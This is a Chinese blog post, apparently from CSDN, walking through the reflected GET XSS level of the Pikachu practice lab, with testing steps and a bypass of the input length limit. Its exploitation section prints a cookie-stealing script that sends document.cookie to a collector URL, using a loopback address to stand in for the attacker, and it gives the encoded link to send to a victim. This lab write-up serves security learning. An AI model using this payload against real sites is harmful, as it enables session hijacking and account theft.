Pikachu靶场:反射型XSS(get)

最新推荐文章于 2024-04-23 21:44:55 发布
最新推荐文章于 2024-04-23 21:44:55 发布
阅读量2.3k 收藏 14
点赞数 4
分类专栏: Pikachu靶场实战 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/witwitwiter/article/details/115486831
版权

Pikachu靶场:反射型XSS(get)

实验环境以及工具

Firefox浏览器、Burp Suite、Pikachu靶场

实验原理

●反射型
交互的数据一般不会被存在在数据库里面,一次性,所见即所得,一般出现在查询类页面等。

形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。

跨站脚本漏洞测试流程

1.在目标站点上找到输入点,比如查询接口,留言板等;

2.输入一组“特殊字符+唯一识别字符”,点击提交后,查看返回的源码,是否有做对应的处理;

3.通过搜索定位到唯一字符,结合唯一字符前后语法确认是否可以构造执行js的条件(构造闭合);

4.提交构造的脚本代码(以及各种绕过姿势),看是否可以成功执行,如果成功执行则说明存在XSS漏洞;

具体操作

1.在目标站点上找到输入点,比如查询接口,留言板等;

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mTDKlvk5-1617780345450)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210406155050194.png)]

2.输入一组“特殊字符+唯一识别字符”,点击提交后,查看返回的源码,是否有做对应的处理;

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iy5Do56c-1617780345452)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210406155339857.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-7W4bAeIb-1617780345453)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210406155941934.png)]

3.通过搜索定位到唯一字符,结合唯一字符前后语法确认是否可以构造执行js的条件(构造闭合);

打开页面源代码按Ctrl+f查找123

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6HNEJwQE-1617780345455)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210406155552684.png)]

可见我们输入的字符串直接嵌入到了p标签中,已知我们是可以在p标签里写js代码的,所以我们可以尝试写入一段特制的js代码。

4.提交构造的脚本代码(以及各种绕过姿势),看是否可以成功执行,如果成功执行则说明存在XSS漏洞;

在输入代码的时候,发现输入到20字符就输入不进去了,我们可以进入开发者模式,使用选择器找到输入框相应代码,将maxlength修改为更大值例如200。写入一个弹窗的代码,弹窗内容为Hello。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KLnfEanG-1617780345457)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210406160248547.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Rir4rPTc-1617780345460)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210406160507845.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-H4TZOky4-1617780345461)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210406160810130.png)]

发现浏览器将输入的内容放进了链接里,如果直接访问这个链接,也会弹窗。

漏洞利用

将本地XSS后台相关代码配置好,Pikachu的后台位于\pkxss

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-wu0aEMhh-1617780345461)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210406163801256.png)]

如果输入的JS代码为下面这段,其中127.0.0.1是本地地址,这里用本地换回地址模拟攻击者的IP地址。

<script>document.location = 'http://127.0.0.1/Pikachu//pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

在点击submit后形成的URL为这一段

http://127.0.0.1/Pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2F127.0.0.1%2FPikachu%2F%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E&submit=submit

如果将其直接发送给别人在别人点击后会进入反射型XSS页面,瞬间重定向到设置的Pikachu首页。

这时登录XSS后台点击cookie收集就可以看到收集的cookie

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-loy0hCO3-1617780345462)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210406163146478.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3nytnVmd-1617780345462)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210406163133933.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tZjNHjsU-1617780345462)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210406164949113.png)]

总结

XSS是利用网站的输入接口进行攻击。在前期通过各种特殊字符进行试探后,若是符合攻击的条件,就进行js恶意代码的编写,注入到输入接口之后,获取URL将其发送给受害者,即可进行攻击。

witwitwiter
关注
  • 4
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
pikachu靶场反射GET方法
m0_52663093的博客
11-20 2549
一 什么是用户枚举漏洞 用户枚举漏洞就是指枚举猜测用户名,但不能生成有效用户名列表。这个漏洞之所以存在,是因为服务器在对消息完整解析之前,用户查询了不存在的用户名,所以产生用户枚举漏洞 二 影响的版本 OpenSSH >=2.3&&<=7.7 三漏洞复现 首先打开kali虚拟机 然后打开open ssh 的CVE-2018-15473 输入命令docker-compose up -d 然后等待docker环境 如图所示。 环境启动后,我们在客户端执行ssh -o.
PikachuXSS
weixin_48621644的博客
10-14 3089
小羊学安全 任重而道远~
pikachu--xss
鲨鱼辣椒的博客
05-12 4412
XSS概述 XSS全称跨站脚本(Cross Site Scripting)是web中最为常见的漏洞之一,也是危害特别大的一种漏洞,一直高居漏洞排行榜的前几名。XSS漏洞的成因是没有对WEB前端的输入边界尽心严格的过滤,造成攻击者可以通过构造脚本语言使得输入的内容被当成正常的HTML来执行(类似于SQL注入),从而产生危害。xss漏洞危害的对象主要是前端用户,并且可以用来进行钓鱼、前端js挖矿、用户cookie获取、甚至可以结合浏览器自身的漏洞对主机进行远程控制等。 XSS(窃取cookie)攻击流程 .
Pikachu第二弹:XSS
Pisces_mango的博客
08-14 1420
一、反射xss(get) 1.输入语句,发现有长度限制,按F12,修改源码字符长度 2.输入语句 3.出现弹窗 二、反射xss(post) 1.输入账号密码登录 2.登录XSS后台,然后搭建恶意站点 这里是以POST的方式提交的,参数内容不会出现在URL中,这时候我们不能直接把我们的恶意代码嵌入到URL中,我们需要自己搭一个恶意站点,然后在网站上放一个post表单,将存放post表单的链接发送给受害者,诱导受害者点击这个post表单会自动向漏洞服务器提交一个POST请求,实
[ pikachu ] 靶场通关之 XSS (二) --- 反射 XSS 之 get
qq_51577576的博客
01-14 2509
???? 博主介绍 ????‍???? 博主介绍:大家好,我是_PowerShell,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 ????点赞➕评论➕收藏 == 养成习惯(一键三连)???? ????欢迎关注????一起学习????一起讨论⭐️一起进步????文末有彩蛋 ????作者水平有限,欢迎各位大佬指点,相互学习进步! 目录 ???? 博主介绍 一、反射xss(get) 二、过关: 1. 页面 2. 首先确认一下这个页
pikachu靶场第五关——XSS(跨站脚本)之反射xss(get)(附代码审计)
yzasts的博客
03-18 1434
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类:1.反射XSS;2.存储XSS;3.DOMXSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。
pikachu靶场XSS漏洞通关
Zqinglele的博客
04-19 2042
存储是将攻击者在留言板等输入框中输入的恶意代码直接存入数据库中,由于数据库不识别js代码,一旦有用户打开存有恶意代码的网页界面,那么恶意代码就会被从数据库中读出,是一类危害最大的xss攻击。dom又称self-xss,攻击者利用dom节点的结构在网页中插入一段恶意代码,这段代码被简单处理或未处理后又在网页中的一个位置显示出来,攻击过程中所有恶意代码均在前端执行。在用户点击被攻击者插入恶意代码的网页链接后,恶意代码在被攻击者的网页中被执行。尝试插入payload,发现是有长度限制,不能把这句完整插入。
Pikachu靶场实战 xss
她叫常玉莹
07-16 2947
pikachu xssxss反射xss(get)反射xss(post)存储xssDomxssDOMxss-xxss之盲打xss之过滤xss之htmlspecialcharsxss之href输出xss之js输出 xss 跨站脚本(Cross-Site Scripting)是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。它允许恶意用户将代码注入网页,其他用户在浏览网页时就会受到影响。恶意用户利用xss代码攻击成功后,可能层到很高的权限(如执行一些操作)、私密网页内容、会话和cookie等各
Pikachu靶场通关笔记--Cross-Site Scripting (XSS
weixin_45908624的博客
12-02 1210
pikachu XSS
pikachu靶场练习——XSS详解
qq_42176496的博客
09-04 2696
pikachu靶场 XSS详解
pikache靶场通关——XSS漏洞
p36273的博客
06-17 3302
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS反射XSS;存储XSS;DOMXSS;XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入;输出转义:根据输出点的位置对输出到前端的内容进行适当转义;
反射xss(get)
weixin_45815516的博客
11-20 72
pikachu靶场:Cross-Site Scripting之反射xss(get)
Pikachu(皮卡丘靶场)初识XSS(常见标签事件及payload总结)
Welcome To Myon'Blog !
11-14 1815
XSS又叫跨站脚本攻击,是HTML代码注入,通过对网页注入浏览器可执行代码,从而实现攻击。​。domxss 的函数从具有 id 为 "text" 的元素中获取输入值,然后将其作为链接的 href 属性值插入到具有 id 为 "dom" 的元素的 innerHTML 中。尝试它给的payload:'>通过在链接的 href 属性中闭合单引号,然后插入一个图片元素,该元素的 onmouseover 事件触发一个弹窗,显
pikachu-xss
最新发布
2303_81631620的博客
04-23 535
按原本的做法,应该先写一个script标签测试一下,但是发现有字符限制。
pikachu靶场-XSS
braty_的博客
02-21 1401
这里是用get请求做了一个长度的限制,我们使用hackbar来进行传参,页面会弹出一个xss,证明存在xss漏洞,我们顺便讲一下 beef-xss工具。形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。在输入框随便输入 11 ,F12 可以看见,11 被添加在了 标签里面(html的超链接标签)XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。
pikachu漏洞练习平台使用笔记-XSS反射XSS
donghongzhe的博客
05-24 1787
在表单里直接输入xss语句,会发现限制字符长度,我们可以审查元素,把长度20改大一点,就恶意输入更多字符了,但是每次刷新后还会重新变为20,所以还是直接在网址框里输入吧 我们输入一个简单的XSS语句 <script>alert("XSS")</script> 发现可以解析,即存在XSS漏洞 接下来,我们简单利用一下这个反射XSS漏洞,来获取用户cookie 我们需要一个接收cookie的服务器(127.0.0.1:80),来接收受害主机的cookie 下..
Pikachu靶场——XSS漏洞(Cross-Site Scripting)
来日可期的博客
10-07 1275
跨站点脚本(Cross Site Scripting,XSS)是指客户端代码注入攻击,攻击者可以在合法网站或Web应用程序中执行恶意脚本。当wb应用程序在其生成的输出中使用未经验证或未编码的用户输入时,就会发生XSS
皮卡丘(pikachu) XSS三种类举例
weixin_44787832的博客
07-22 3475
反射xss(get) 首先输入 >'''<> 并提交,发现可以正常输出 查看源码 发现我们的输入全部输出到了p标签中 之后我们输入payload: <script>alert("xss")</script> 发现输入框中容不下这么长的数据 之后我们F12,去改maxlength的值 改完后我们的payload执行成功 查看源码,JS代码被浏览器执行 像这种GETXSS漏洞,一般可将含XSS的URL伪.
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值